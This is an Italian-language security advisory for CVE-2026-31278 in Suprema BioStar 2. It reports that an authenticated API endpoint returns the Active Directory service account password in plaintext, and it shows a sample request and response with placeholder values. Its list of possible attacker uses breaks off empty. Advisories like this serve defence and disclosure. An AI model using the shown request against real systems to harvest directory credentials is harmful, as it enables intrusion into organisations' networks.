
Analisi della CVE per la vulnerabilità di esposizione delle credenziali di Active Directory in Suprema BioStar 2
| Campo | Dettagli |
|---|---|
| CVE ID | CVE-2026-31278 |
| Fornitore | Suprema Inc. |
| Prodotto | BioStar 2 |
| Tipo di vulnerabilità | Divulgazione di informazioni sensibili / Esposizione di credenziali |
| Vettore d'attacco | Remoto / Autenticato / Bassa complessità |
| Gravità | Alta |
| Corretto in | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| Ricercatore | Abdullah Alannaz |
Esiste una vulnerabilità di divulgazione di informazioni sensibili in Suprema BioStar 2 dovuta alla gestione non corretta delle impostazioni di integrazione con Active Directory. L'endpoint API backend /api/v2/setting/adserversetting restituisce le credenziali dell'account di bind di Active Directory in chiaro, nonostante la password sia mascherata nell'interfaccia amministrativa.
Sebbene il campo password sia mascherato nell'interfaccia amministrativa, le richieste autenticate all'API backend rivelano la password completa non cifrata insieme ai parametri di configurazione LDAP, inclusa la comunicazione SSL disabilitata.
Un attaccante autenticato invia una richiesta HTTP GET all'endpoint di configurazione del server AD e riceve la password dell'account di servizio di Active Directory in chiaro nella risposta del server.
Richiesta:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
Risposta:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
Un attaccante autenticato può sfruttare le credenziali divulgate per:
CVE-2026-31278 assegnato da MITRE | Correzione rilasciata in BioStar 2 v2.9.12 / BioStarX v1.0.2 |
Abdullah Alannaz Ricercatore di sicurezza
Questa vulnerabilità è stata divulgata in modo responsabile a Suprema. Il fornitore ha confermato il problema e ha coordinato con MITRE l'assegnazione del CVE.